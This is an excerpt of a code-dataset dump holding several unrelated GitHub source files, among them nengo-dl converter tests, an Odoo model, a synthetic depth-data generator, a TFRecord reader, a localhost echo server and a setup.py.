False\"\n ):\n converter.Converter(model, temporal_model=True, allow_fallback=True)\n\n\ndef test_spiking_activation_old_nengo():\n keras_spiking = pytest.importorskip(\"keras_spiking\")\n\n inp = x = tf.keras.Input((None, 10), batch_size=1)\n x = keras_spiking.SpikingActivation(\"relu\")(x)\n model = tf.keras.Model(inp, x)\n\n ctx = (\n pytest.raises(TypeError, match=\"requires Nengo>=3.1.0\")\n if version.parse(nengo.__version__) <= version.parse(\"3.0.0\")\n else contextlib.suppress()\n )\n\n with ctx:\n converter.Converter(\n model, allow_fallback=False, temporal_model=True, inference_only=True\n )\n\n\n@pytest.mark.parametrize(\"tau, dt\", [(0.01, 0.001), (0.013, 0.003)])\n@pytest.mark.parametrize(\"Layer\", (compat.Lowpass, compat.Alpha))\ndef test_lowpass_alpha(Layer, tau, dt, Simulator, rng):\n pytest.importorskip(\"keras_spiking\")\n\n inp = x = tf.keras.Input((None, 10))\n x = tf.keras.layers.Dense(units=10)(x)\n x = Layer(tau_initializer=tau, dt=dt, trainable=False)(x)\n\n model = tf.keras.Model(inp, x)\n\n with (\n pytest.warns(Warning, match=\"dt will be controlled by 
Simulator.dt\")\n if dt != 0.001\n else contextlib.suppress()\n ):\n conv = converter.Converter(model, temporal_model=True, allow_fallback=False)\n\n inp_vals = rng.uniform(0, 2, size=(8, 50, 10))\n\n with Simulator(conv.net, dt=dt, minibatch_size=8) as sim:\n model_out = model.predict(inp_vals)\n nengo_out = sim.predict(inp_vals)\n\n # nengo model is off by one timestep due to the synaptic delay\n assert np.allclose(\n model_out[:, :-1], nengo_out[conv.outputs[x]][:, 1:], atol=5e-6\n )\n\n # check training\n # Training works, but is not identical due to the different dynamics introduced\n # by the one-timestep delay.\n out_vals = nengo.Lowpass(tau).filt(inp_vals, axis=1)\n\n model.compile(optimizer=tf.optimizers.SGD(0.1), loss=tf.losses.mse)\n model_log = model.fit(inp_vals, out_vals, epochs=3)\n\n sim.compile(optimizer=tf.optimizers.SGD(0.1), loss=tf.losses.mse)\n nengo_log = sim.fit(inp_vals, out_vals, epochs=3)\n\n assert np.allclose(\n nengo_log.history[\"loss\"][-1],\n model_log.history[\"loss\"][-1],\n rtol=0.05,\n atol=0.01,\n )\n\n model_out = model.predict(inp_vals)\n nengo_out = sim.predict(inp_vals)\n assert np.allclose(\n model_out[:, :-1], nengo_out[conv.outputs[x]][:, 1:], rtol=0.03, atol=0.03\n )\n\n # can't convert trainable layers\n inp = tf.keras.Input((None, 10))\n layer = Layer(tau_initializer=0.1, trainable=True)\n model = tf.keras.Model(inp, layer(inp))\n with pytest.raises(TypeError, match=\"layer.trainable=False\"):\n converter.Converter(model, temporal_model=True)\n\n # can't convert layers with non-zero initial level\n layer.trainable = False\n tf.keras.backend.set_value(\n layer.layer.cell.initial_level, np.ones(layer.layer.cell.initial_level.shape)\n )\n model = tf.keras.Model(inp, layer(inp))\n with pytest.raises(TypeError, match=\"initial_level != 0\"):\n converter.Converter(model, temporal_model=True)\n\n # can't convert layers with individual taus\n tf.keras.backend.set_value(\n layer.layer.cell.initial_level, np.zeros(layer.layer.cell.initial_level.shape)\n )\n tf.keras.backend.set_value(\n layer.layer.cell.tau, np.arange(10).reshape(layer.layer.cell.tau.shape)\n )\n model = tf.keras.Model(inp, layer(inp))\n with pytest.raises(TypeError, match=\"different tau values\"):\n converter.Converter(model, temporal_model=True)\n\n\n@pytest.mark.parametrize(\"timesteps\", [10, None])\ndef test_time_distributed(timesteps):\n inp = x = tf.keras.Input((timesteps, 8))\n x = tf.keras.layers.TimeDistributed(tf.keras.layers.Dense(units=16))(x)\n x = tf.keras.layers.TimeDistributed(tf.keras.layers.Reshape((4, 4, 1)))(x)\n x = tf.keras.layers.TimeDistributed(\n tf.keras.layers.Conv2D(filters=2, kernel_size=3)\n )(x)\n\n _test_convert(inp, x, temporal_model=True)\n\n with (\n pytest.raises(ValueError, match=\"Input.*fully specified.*temporal_model=True\")\n if timesteps is None\n else pytest.raises(TypeError, match=\"only be converted when temporal_model=Tru\")\n ):\n converter.Converter(tf.keras.Model(inp, x), temporal_model=False)\n","repo_name":"nengo/nengo-dl","sub_path":"nengo_dl/tests/test_converter.py","file_name":"test_converter.py","file_ext":"py","file_size_in_byte":35371,"program_lang":"python","lang":"en","doc_type":"code","stars":81,"dataset":"github-code","pt":"29"} +{"seq_id":"35544342460","text":"# -*- coding: utf-8 -*-\nfrom openerp import api\nfrom openerp import fields\nfrom openerp import models\n\n\nclass Account_analytic_account_inherited(models.Model):\n _inherit = 'account.analytic.account' \n \n acrescimo_desconto = fields.One2many(\n 
comodel_name='acrescimo_desconto',\n inverse_name='contrato',\n string='Acréscimos/Descontos',\n help='Acréscimos e descontos recorrentes associadas ao contrato')\n\n\nclass Acrescimo_desconto(models.Model):\n \"\"\"\n Model for recording future surcharges (acréscimos) and discounts (descontos) on a contract.\n \"\"\"\n\n _name = 'acrescimo_desconto'\n _inherit = ['mail.thread', 'ir.needaction_mixin']\n\n name = fields.Selection(\n selection=[('acres', 'Acréscimo'),\n ('desc', 'Desconto')],\n string='Tipo',\n required=True,\n track_visibility='onchange')\n\n active = fields.Boolean(\n string=\"Ativo\",\n track_visibility='onchange'\n )\n\n observacoes = fields.Text(\n string=\"Observações\",\n track_visibility='onchange'\n )\n\n valor = fields.Float(\n string=\"Valor\",\n required=True,\n track_visibility='onchange'\n )\n\n repeticoes = fields.Integer(\n string=\"Repetições\",\n track_visibility='onchange'\n )\n\n repeticoes_executadas = fields.Integer(\n string=\"Repetições Executadas\",\n track_visibility='onchange'\n )\n\n contrato = fields.Many2one(\n string=\"Contrato\",\n comodel_name='account.analytic.account',\n required=True,\n track_visibility='onchange')\n\n","repo_name":"Guobower/outbox_odoo","sub_path":"boleto_registrado/models/account_analytic_account_inherited.py","file_name":"account_analytic_account_inherited.py","file_ext":"py","file_size_in_byte":1680,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"29"} +{"seq_id":"40477955791","text":"import argparse\n\nimport numpy as np\nimport pickle\nfrom pathlib import Path\nimport time\nimport json\nimport cv2\nimport collections\nimport sys\nimport h5py\nimport os\n\nsys.path.append('../')\nimport co\nfrom data_manipulation import get_rotation_matrix, read_pattern_file, post_process\n\nconfig_path = os.path.abspath(os.path.join(os.path.dirname( __file__ ), '..', 'config.json'))\nwith open(config_path) as fp:\n    config = json.load(fp)\n    CTD_path = Path(config['CTD_DIR'])\n    sys.path.append(str(CTD_path / 'data'))\n    sys.path.append(str(CTD_path / 'renderer'))\n\nfrom lcn import lcn\nfrom cyrender import PyRenderInput, PyCamera, PyShader, PyRenderer\n\ndef get_objs(shapenet_dir, obj_classes, num_perclass=100):\n    shapenet = {'chair': '03001627',\n                'airplane': '02691156',\n                'car': '02958343',\n                'watercraft': '04530566'}\n\n    obj_paths = []\n    for cls in obj_classes:\n        if cls not in shapenet.keys():\n            raise Exception('unknown class name')\n        ids = shapenet[cls]\n        obj_path = sorted(Path(f'{shapenet_dir}/{ids}').glob('**/models/*.obj'))\n        obj_paths += obj_path[:num_perclass]\n    print(f'found {len(obj_paths)} object paths')\n\n    objs = []\n    for obj_path in obj_paths:\n        print(f'load {obj_path}')\n        v, f, _, n = co.io3d.read_obj(obj_path)\n        diffs = v.max(axis=0) - v.min(axis=0)\n        v /= (0.5 * diffs.max())\n        v -= (v.min(axis=0) + 1)\n        f = f.astype(np.int32)\n        objs.append((v, f, n))\n    print(f'loaded {len(objs)} objects')\n\n    return objs\n\n\ndef get_mesh(rng, min_z=0):\n    # set up background board\n    verts, faces, normals, colors = [], [], [], []\n    v, f, n = co.geometry.xyplane(z=0, interleaved=True)\n    v[:, 2] += -v[:, 2].min() + rng.uniform(3, 5)\n    v[:, :2] *= 5e2\n    v[:, 2] = np.mean(v[:, 2]) + (v[:, 2] - np.mean(v[:, 2])) * 5e2\n    c = np.empty_like(v)\n    c[:] = rng.uniform(0, 1, size=(3,)).astype(np.float32)\n    verts.append(v)\n    faces.append(f)\n    normals.append(n)\n    colors.append(c)\n\n    # randomly sample 4 foreground objects for each scene\n    for shape_idx in range(4):\n        v, f, n = objs[rng.randint(0, len(objs))]\n        v, f, n = v.copy(), 
f.copy(), n.copy()\n\n s = rng.uniform(0.25, 1)\n v *= s\n R = co.geometry.rotm_from_quat(co.geometry.quat_random(rng=rng))\n v = v @ R.T\n n = n @ R.T\n v[:, 2] += -v[:, 2].min() + min_z + rng.uniform(0.5, 3)\n v[:, :2] += rng.uniform(-1, 1, size=(1, 2))\n\n c = np.empty_like(v)\n c[:] = rng.uniform(0, 1, size=(3,)).astype(np.float32)\n\n verts.append(v.astype(np.float32))\n faces.append(f)\n normals.append(n)\n colors.append(c)\n\n verts, faces = co.geometry.stack_mesh(verts, faces)\n normals = np.vstack(normals).astype(np.float32)\n colors = np.vstack(colors).astype(np.float32)\n return verts, faces, colors, normals\n\n\ndef create_data(pattern_type, out_root, idx, n_samples, imsize_proj, imsize, pattern, K_proj, K, K_processed, baseline, blend_im, noise,\n track_length=4):\n tic = time.time()\n rng = np.random.RandomState()\n\n rng.seed(idx)\n\n verts, faces, colors, normals = get_mesh(rng)\n data = PyRenderInput(verts=verts.copy(), colors=colors.copy(), normals=normals.copy(), faces=faces.copy())\n print(f'loading mesh for sample {idx + 1}/{n_samples} took {time.time() - tic}[s]')\n\n # let the camera point to the center\n center = np.array([0, 0, 3], dtype=np.float32)\n\n basevec = np.array([-baseline, 0, 0], dtype=np.float32)\n unit = np.array([0, 0, 1], dtype=np.float32)\n\n cam_x_ = rng.uniform(-0.2, 0.2)\n cam_y_ = rng.uniform(-0.2, 0.2)\n cam_z_ = rng.uniform(-0.2, 0.2)\n\n ret = collections.defaultdict(list)\n blend_im_rnd = np.clip(blend_im + rng.uniform(-0.1, 0.1), 0, 1)\n\n # capture the same static scene from different view points as a track\n for ind in range(track_length):\n\n cam_x = cam_x_ + rng.uniform(-0.1, 0.1)\n cam_y = cam_y_ + rng.uniform(-0.1, 0.1)\n cam_z = cam_z_ + rng.uniform(-0.1, 0.1)\n\n tcam = np.array([cam_x, cam_y, cam_z], dtype=np.float32)\n\n if np.linalg.norm(tcam[0:2]) < 1e-9:\n Rcam = np.eye(3, dtype=np.float32)\n else:\n Rcam = get_rotation_matrix(center, center - tcam)\n\n tproj = tcam + basevec\n Rproj = Rcam\n\n ret['R'].append(Rcam)\n ret['t'].append(tcam)\n\n fx_proj = K_proj[0, 0]\n fy_proj = K_proj[1, 1]\n px_proj = K_proj[0, 2]\n py_proj = K_proj[1, 2]\n im_height_proj = imsize_proj[0]\n im_width_proj = imsize_proj[1]\n proj = PyCamera(fx_proj, fy_proj, px_proj, py_proj, Rproj, tproj, im_width_proj, im_height_proj)\n\n fx = K[0, 0]\n fy = K[1, 1]\n px = K[0, 2]\n py = K[1, 2]\n im_height = imsize[0]\n im_width = imsize[1]\n cam = PyCamera(fx, fy, px, py, Rcam, tcam, im_width, im_height)\n\n shader = PyShader(0.5, 1.5, 0.0, 10)\n pyrenderer = PyRenderer(cam, shader, engine='gpu')\n if args.pattern_type == 'default':\n pyrenderer.mesh_proj(data, proj, pattern.copy(), d_alpha=0, d_beta=0.0)\n else:\n pyrenderer.mesh_proj(data, proj, pattern.copy(), d_alpha=0, d_beta=0.35)\n\n # get the reflected laser pattern $R$\n im = pyrenderer.color().copy()\n im = cv2.cvtColor(im, cv2.COLOR_RGB2GRAY)\n\n focal_length = K_processed[0, 0]\n depth = pyrenderer.depth().copy()\n disp = baseline * focal_length / depth\n\n # get the ambient image $A$\n ambient = pyrenderer.normal().copy()\n ambient = cv2.cvtColor(ambient, cv2.COLOR_RGB2GRAY)\n\n # get the noise free IR image $J$\n im = blend_im_rnd * im + (1 - blend_im_rnd) * ambient\n ret['ambient'].append(post_process(pattern_type, ambient)[None].astype(np.float32))\n\n # get the gradient magnitude of the ambient image $|\\nabla A|$\n ambient = ambient.astype(np.float32)\n sobelx = cv2.Sobel(ambient, cv2.CV_32F, 1, 0, ksize=5)\n sobely = cv2.Sobel(ambient, cv2.CV_32F, 0, 1, ksize=5)\n grad = np.sqrt(sobelx ** 
2 + sobely ** 2)\n grad = np.maximum(grad - 0.8, 0.0) # parameter\n\n # get the local contract normalized grad LCN($|\\nabla A|$)\n grad_lcn, grad_std = lcn.normalize(grad, 5, 0.1)\n grad_lcn = np.clip(grad_lcn, 0.0, 1.0) # parameter\n ret['grad'].append(post_process(pattern_type, grad_lcn)[None].astype(np.float32))\n\n ret['im'].append(post_process(pattern_type, im)[None].astype(np.float32))\n ret['disp'].append(post_process(pattern_type, disp)[None].astype(np.float32))\n\n for key in ret.keys():\n ret[key] = np.stack(ret[key], axis=0)\n\n # save to files\n out_dir = out_root / f'{idx:08d}'\n out_dir.mkdir(exist_ok=True, parents=True)\n out_path = out_dir / f'frames.hdf5'\n with h5py.File(out_path, \"w\") as f:\n for k, val in ret.items():\n # f.create_dataset(k, data=val, compression=\"lzf\")\n f.create_dataset(k, data=val)\n\n print(f'create sample {idx + 1}/{n_samples} took {time.time() - tic}[s]')\n\n\nif __name__ == '__main__':\n\n parser = argparse.ArgumentParser()\n parser.add_argument('pattern_type',\n help='Select the pattern file for projecting dots',\n default='default',\n choices=['default', 'kinect', 'real'], type=str)\n args = parser.parse_args()\n\n np.random.seed(42)\n\n # output directory\n config_path = os.path.abspath(os.path.join(os.path.dirname(__file__), '..', 'config.json'))\n with open(config_path) as fp:\n config = json.load(fp)\n data_root = Path(config['DATA_DIR'])\n shapenet_root = config['SHAPENET_DIR']\n\n out_root = data_root\n out_root.mkdir(parents=True, exist_ok=True)\n\n # load shapenet models\n obj_classes = ['chair']\n objs = get_objs(shapenet_root, obj_classes)\n\n # camera parameters\n if args.pattern_type == 'real':\n fl_proj = 1112.1806640625\n fl = 1112.1806640625\n imsize_proj = (1280, 1080)\n imsize = (1280, 1080)\n imsize_processed = (512, 432)\n K_proj = np.array([[fl_proj, 0, 517.0896606445312], [0, fl_proj, 649.6329956054688], [0, 0, 1]], dtype=np.float32)\n K = np.array([[fl, 0, 517.0896606445312], [0, fl, 649.6329956054688], [0, 0, 1]], dtype=np.float32)\n baseline = 0.0246\n blend_im = 0.6\n noise = 0\n else:\n fl_proj = 1582.06005876\n fl = 435.2\n imsize_proj = (4096, 4096)\n imsize = (512, 432)\n imsize_processed = (512, 432)\n K_proj = np.array([[fl_proj, 0, 2047.5], [0, fl_proj, 2047.5], [0, 0, 1]], dtype=np.float32)\n K = np.array([[fl, 0, 216], [0, fl, 256], [0, 0, 1]], dtype=np.float32)\n baseline = 0.025\n blend_im = 0.6\n noise = 0\n\n # capture the same static scene from different view points as a track\n track_length = 4\n\n # load pattern image\n pattern = read_pattern_file(args.pattern_type, imsize_proj)\n\n x_cam = np.arange(0, imsize[1])\n y_cam = np.arange(0, imsize[0])\n x_mesh, y_mesh = np.meshgrid(x_cam, y_cam)\n x_mesh_f = np.reshape(x_mesh, [-1])\n y_mesh_f = np.reshape(y_mesh, [-1])\n\n grid_points = np.stack([x_mesh_f, y_mesh_f, np.ones_like(x_mesh_f)], axis=0)\n grid_points_mapped = K_proj.dot(np.linalg.inv(K).dot(grid_points))\n grid_points_mapped = grid_points_mapped / grid_points_mapped[2, :]\n\n x_map = np.reshape(grid_points_mapped[0, :], x_mesh.shape)\n y_map = np.reshape(grid_points_mapped[1, :], y_mesh.shape)\n x_map, y_map = x_map.astype('float32'), y_map.astype('float32')\n mapped_pattern = cv2.remap(pattern, x_map, y_map, cv2.INTER_LINEAR)\n\n pattern_processed, K_processed = post_process(args.pattern_type, mapped_pattern, K)\n # write settings to file\n settings = {\n 'imsize': imsize_processed,\n 'pattern': pattern_processed,\n 'baseline': baseline,\n 'K': K_processed,\n }\n out_path = out_root / 
f'settings.pkl'\n print(f'write settings to {out_path}')\n with open(str(out_path), 'wb') as f:\n pickle.dump(settings, f, pickle.HIGHEST_PROTOCOL)\n\n # start the job\n n_samples = 2 ** 10 + 2 ** 13\n # n_samples = 2048\n for idx in range(n_samples):\n parameters = (\n args.pattern_type, out_root, idx, n_samples, imsize_proj, imsize, pattern, K_proj, K, K_processed, baseline, blend_im, noise, track_length)\n create_data(*parameters)","repo_name":"idiap/DepthInSpace","sub_path":"data/create_syn_data.py","file_name":"create_syn_data.py","file_ext":"py","file_size_in_byte":10563,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"29"} +{"seq_id":"36858961600","text":"# -*- coding=utf-8\n\n\"\"\" Tests suite for dewyatochka.core.config.source.filesystem \"\"\"\n\nfrom os import path\n\nimport unittest\n\nfrom dewyatochka.core.config.source.filesystem import *\nfrom dewyatochka.core.config.exception import ReadError\n\n\n# Root path to config test files\n_CONFIG_FILES_ROOT = path.dirname(__file__) + '/../files/config'\n_CONFIG_FILES_ROOT_REAL = path.realpath(_CONFIG_FILES_ROOT)\n\n\nclass TestFilesystem(unittest.TestCase):\n \"\"\" Tests suite for dewyatochka.core.config.source.filesystem.Filesystem \"\"\"\n def test_files(self):\n \"\"\" Test directory scan \"\"\"\n class _VoidFilesystemSource(Filesystem):\n \"\"\" Filesystem abstract methods stubs \"\"\"\n file_extension = '.ini'\n\n def _do_read(self, files: list) -> dict:\n \"\"\" Abstract method stub \"\"\"\n return {}\n\n @property\n def files(self):\n \"\"\" Files list getter \"\"\"\n return self._files\n\n file = _CONFIG_FILES_ROOT_REAL + '/ini_file.ini'\n self.assertEqual(_VoidFilesystemSource(file).files, {file})\n\n directory = _CONFIG_FILES_ROOT_REAL + '/ini_directory'\n self.assertEqual(_VoidFilesystemSource(directory).files,\n {directory + '/test_config1.ini', directory + '/test_config2.ini'})\n\n self.assertRaises(IOError, _VoidFilesystemSource('/foo.bar').read)\n\n\nclass TestINIFiles(unittest.TestCase):\n \"\"\" Tests suite for dewyatochka.core.config.source.filesystem.INIFiles \"\"\"\n\n def test_do_read(self):\n \"\"\" Test configs parsing \"\"\"\n config = INIFiles(_CONFIG_FILES_ROOT + '/ini_file.ini').read()\n self.assertEqual({section: dict(config[section]) for section in config},\n {'section1': {'foo': 'bar'}})\n\n config = INIFiles(_CONFIG_FILES_ROOT + '/ini_directory/').read()\n self.assertEqual({section: dict(config[section]) for section in config},\n {'section1': {'foo': 'bar'}, 'section2': {'bar': 'baz'}})\n\n corrupted_source = INIFiles(_CONFIG_FILES_ROOT + '/corrupted_ini_file.ini')\n self.assertRaises(ReadError, corrupted_source.read)\n","repo_name":"kawashiro/dewyatochka2","sub_path":"test/cases/test_core_config_source_filesystem.py","file_name":"test_core_config_source_filesystem.py","file_ext":"py","file_size_in_byte":2176,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"29"} +{"seq_id":"31857202571","text":"# encoding: utf-8 \n\n\"\"\" \n@version: v1.0 \n@author: Richard\n@license: Apache Licence \n@contact: billions.richard@qq.com \n@site: \n@software: PyCharm \n@file: selectServer.py \n@time: 2018/6/2 14:25 \n\"\"\"\nfrom pprint import pprint as P\nimport socket\nimport select\n\nserver_socket = socket.socket()\nserver_socket.bind(('127.0.0.1', 8080))\nserver_socket.listen(5)\n\nrlist = [server_socket, ]\n\nwhile True:\n r, w, s = select.select(rlist, [], []) # 水平触发\n\n for des in r:\n if des is server_socket:\n 
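            # a readable event on the listening socket means a new client is connecting\n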
conn_sock, addr = des.accept()\n            rlist.append(conn_sock)  # put the socket for talking to this client into the watch list\n        else:\n            client_data = des.recv(1024).decode('utf8')\n\n            print('client<<<%s' % client_data)\n\n            des.send(client_data.upper().encode('utf8'))\n\n\n\n    print('>>>>>>>>')\n","repo_name":"BillionsRichard/pycharmWorkspace","sub_path":"python全栈3期/IO模型/selectServer.py","file_name":"selectServer.py","file_ext":"py","file_size_in_byte":856,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"29"} +{"seq_id":"5585677964","text":"srcdir = \"resources/\"\r\n\r\n\r\nif __name__ == \"__main__\":\r\n    import os\r\n    import base64\r\n    from glob import glob\r\n\r\n    out = open(\"build/resources.cpp\", \"w\")\r\n\r\n    lines = []\r\n    lines.append(\"#include \\\"engine/resources.hpp\\\"\")\r\n    lines.append(\"#include <unordered_map>\")\r\n    lines.append(\"\")\r\n    files = [fn for fn in glob(f\"{srcdir}**\", recursive=True) if not os.path.isdir(fn)]\r\n\r\n    # make resource arrays\r\n    vars = list()\r\n\r\n    lines.append(\"// RESOURCE ARRAYS\")\r\n\r\n    for i, fn in enumerate(files):\r\n        with open(fn, \"rb\") as f:\r\n            # correct to relative filename (cut off res dir)\r\n            fn = fn[len(srcdir):]\r\n\r\n            # generate var name and content\r\n            varname = f\"res_{i}\"\r\n            data = [str(b) for b in f.read()]\r\n            arr = \"{\" + \",\".join(data) + \"}\"\r\n\r\n            lines.append(f\"static const unsigned char {varname}[] = {arr};\")\r\n            vars.append((fn, varname, len(data)))\r\n    lines.append(\"\")\r\n\r\n    # make hashmap\r\n\r\n    lines.append(\"// RESOURCE MAP\")\r\n    lines.append(\"static const std::unordered_map<std::string, Resource> res_map =\")\r\n    lines.append(\"{\")\r\n\r\n    for fn, name, size in vars:\r\n        quotfn = \"\\\"\" + fn + \"\\\"\"\r\n        line = \"\\t{\" + quotfn + \", {\" + f\".path={quotfn}, .data={name}, .size={size}\" +\"}},\"\r\n        lines.append(line)\r\n\r\n    lines.append(\"};\")\r\n    lines.append(\"\")\r\n\r\n    lines.append(\"// ACCESS METHOD\")\r\n    lines.append(\"const Resource& Resource::load(const std::string& path) {return res_map.at(path);}\")\r\n\r\n    out.write(\"\\n\".join(lines))\r\n\r\n\r\n","repo_name":"gabriel-gehrke/cpp-ecs-game-engine","sub_path":"scripts/make-resources.py","file_name":"make-resources.py","file_ext":"py","file_size_in_byte":1574,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"29"} +{"seq_id":"12246556503","text":"import os\n\nimport tensorflow as tf\nfrom data_pipeline import tf_augmentations\n\ndef read_and_decode(filename_queue=[], is_training=False,\n                    batch_size=32, height=100, width=100,\n                    n_intermediate_frames=3,\n                    allow_smaller_final_batch=False):\n    '''Reads batches of data from TF Records\n    Args:\n        filename_queue: 'List' that contains TF Records\n        is_training: 'Bool' to specify training mode\n        batch_size: 'Integer' to specify number of samples\n            to be fetched in each iteration\n        height: 'Integer' to specify the target height of\n            each frame\n        width: 'Integer' to specify the target width of\n            each frame\n        n_intermediate_frames: 'Integer' to mention the\n            number of intermediate frames\n        allow_smaller_final_batch: 'Bool' to specify whether\n            the last batch is allowed to have samples < batch_size\n    Returns:\n        'Tensors' of dtype tf.float32 containing batches of\n        first, intermediate and last frames along with\n        meta information\n    '''\n    reader = tf.TFRecordReader()\n    _, ser = reader.read(\n        filename_queue)\n\n    keys_to_features = {\n        'data/first_frame': tf.FixedLenFeature(\n            [],\n            tf.string),\n        'data/last_frame': tf.FixedLenFeature(\n            [],\n            tf.string),\n
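        # each feature below is stored as a serialized byte string; the frames are unpacked later with tf.decode_raw\n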
'data/intermediate_frames': tf.FixedLenFeature(\n [],\n tf.string),\n 'data/meta_file_names': tf.FixedLenFeature(\n [],\n tf.string)}\n\n parsed = tf.parse_single_example(\n ser,\n features=keys_to_features)\n\n fFrame = tf.decode_raw(\n parsed['data/first_frame'],\n tf.uint8)\n\n lFrame = tf.decode_raw(\n parsed['data/last_frame'],\n tf.uint8)\n\n iFrame = tf.decode_raw(\n parsed['data/intermediate_frames'],\n tf.uint8)\n\n meta_file_names = parsed['data/meta_file_names']\n\n # reshape images\n fFrame = tf.reshape(\n fFrame,\n [height, width, 1])\n\n lFrame = tf.reshape(\n lFrame,\n [height, width, 1])\n\n iFrame = tf.reshape(\n iFrame,\n [n_intermediate_frames, height, width, 1])\n\n # check flag for augmentations\n if is_training:\n fFrame, lFrame, iFrame = tf_augmentations.augment(\n fFrame,\n lFrame,\n iFrame)\n\n # cast images to float\n fFrame = tf.cast(fFrame, tf.float32)\n lFrame = tf.cast(lFrame, tf.float32)\n iFrame = tf.cast(iFrame, tf.float32)\n\n # pixels in range [-1, 1]\n fFrame = fFrame / 127.5 - 1.\n lFrame = lFrame / 127.5 - 1.\n iFrame = iFrame / 127.5 - 1.\n \n if is_training:\n fFrames, lFrames, iFrames, mfn = tf.train.shuffle_batch(\n [fFrame, lFrame, iFrame, meta_file_names],\n batch_size=batch_size,\n capacity=1000000,\n min_after_dequeue=10000,\n allow_smaller_final_batch=allow_smaller_final_batch,\n num_threads=4)\n\n else:\n fFrames, lFrames, iFrames, mfn = tf.train.batch(\n [fFrame, lFrame, iFrame, meta_file_names],\n batch_size=batch_size,\n capacity=10000,\n allow_smaller_final_batch=allow_smaller_final_batch,\n num_threads=2)\n\n return fFrames, lFrames, iFrames, mfn\n\n\ndef unit_test():\n '''Performs unit testing to validate efficiency of\n data input pipeline.\n '''\n current_path = os.path.join(\n '/neuhaus/movie/dataset',\n 'tf_records',\n 'slack_20px_fluorescent_window_5')\n\n filename = 'train.tfrecords'\n final_path = os.path.join(\n current_path,\n filename)\n\n with tf.Session().as_default() as sess:\n train_queue = tf.train.string_input_producer(\n [final_path], num_epochs=None)\n fFrames, lFrames, iFrames, mfns = read_and_decode(\n filename_queue=train_queue,\n is_training=True)\n\n init_op = tf.group(\n tf.global_variables_initializer(),\n tf.local_variables_initializer())\n sess.run(init_op)\n\n coord = tf.train.Coordinator()\n threads = tf.train.start_queue_runners(\n coord=coord)\n\n import time\n start = time.time()\n for i in range(200):\n fF, lF, iF, mFN = sess.run(\n [\n fFrames,\n lFrames,\n iFrames,\n mfns])\n\n print(fF.shape, lF.shape, iF.shape) #, mFN) \n\n print('Time taken:{} seconds.....'.format(\n str(\n round(\n time.time() - start,\n 3))))\n\n coord.request_stop()\n\n# unit_test()\n","repo_name":"RohitSaha/W-Cell-Net_cellular_video_interpolation","sub_path":"data_pipeline/read_record.py","file_name":"read_record.py","file_ext":"py","file_size_in_byte":4737,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"29"} +{"seq_id":"72617553999","text":"# -*- coding: utf-8 -*-\nfrom setuptools import setup, find_packages\nimport os\n\nwith open('./requirements.txt') as f:\n INSTALL_REQUIRES = f.read().splitlines()\n\n\ndef _get_version():\n from os.path import abspath, dirname, join\n filename = join(dirname(abspath(__file__)), 'rrgit', 'version.py')\n line = open(filename).read()\n return line.replace('VERSION=', '').strip().strip(\"'\")\n\nsetup(\n name=\"rrgit\",\n author=\"Adam Haile\",\n author_email=\"adammhaile@gmail.com\",\n version=_get_version(),\n description=\"CLI tool for syncing 
files to and from RepRapFirmware 3 via the web API\",\n long_description=open('README.md').read(),\n url=\"https://github.com/adammhaile/rrgit\",\n license=\"GNU General Public License v3 (GPLv3)\",\n packages=find_packages(exclude=[]),\n include_package_data=True,\n entry_points={\n 'console_scripts': [\n 'rrgit = rrgit:main',\n 'rrg = rrgit:main',\n ]\n },\n install_requires=INSTALL_REQUIRES,\n dependency_links=[],\n classifiers=[\n \"Development Status :: 4 - Beta\",\n \"Programming Language :: Python :: 3.7\",\n \"Programming Language :: Python :: 3.8\",\n \"Programming Language :: Python :: 3.9\",\n \"Environment :: Console\",\n \"License :: OSI Approved :: GNU General Public License v3 (GPLv3)\",\n \"Natural Language :: English\",\n ]\n)","repo_name":"adammhaile/rrgit","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1401,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"29"} +{"seq_id":"37118048949","text":"import operator\nfrom collections import OrderedDict\nfrom csr.wheels.bitsandbobs import PureVirtualError\nfrom csr.dev.model.interface import Group, Table, Text, Warning as Warn\nfrom csr.dev.adaptor.text_adaptor import StringTextAdaptor\nfrom csr.dev.model.base_component import BaseComponent\nfrom csr.dev.hw.core.meta.io_struct_io_map_info import RegistersUnavailable\nfrom csr.dev.hw.register_field.register_field import bitz_engine\n\nclass BaseExecState(BaseComponent):\n \"\"\"\n Base class for execution states.\n \"\"\"\n\n def __init__(self, core):\n self.core = core\n\n def _generate_report_body_elements(self):\n raise PureVirtualError\n\n def __repr__(self):\n raise PureVirtualError\n\n\nclass KalimbaExecState(BaseExecState):\n \"\"\"\n Execution state of Kalimba cores.\n \"\"\"\n\n @property\n def r(self):\n 'Accessor to the Kalimba R register bank'\n #pylint: disable=invalid-name\n return self.core.r\n\n @property\n def i(self):\n 'Accessor to the Kalimba I register bank'\n return self.core.i\n\n @property\n def pc(self):\n 'Register accessor'\n return self.core.pc\n\n @property\n def sp(self):\n 'Register accessor'\n return self.core.sp\n\n @property\n def fp(self):\n 'Register accessor'\n return self.core.fp\n\n @property\n def rmac(self):\n \"\"\"\n rmac is a 72-bit value formed from two 32-bit registers and an 8-bit\n register\n \"\"\"\n return self.core.rmac\n\n @property\n def rlink(self):\n 'Accessor to the REGFILE_RLINK register'\n return self.core.rlink\n\n @property\n def core_regs_dict(self):\n \"\"\"\n Returns the core registers as a dictionary. Keys are lower case and of\n the basic form. i.e. REGFILE_R0 would have key of \"r0\"\n \"\"\"\n return self.core.core_regs_dict\n\n def _print_registers(self, report=False):\n \"\"\"\n Pretty print method for displaying the registers.\n\n p: report If False, then return output as a string. 
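(the string form is produced by StringTextAdaptor). 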
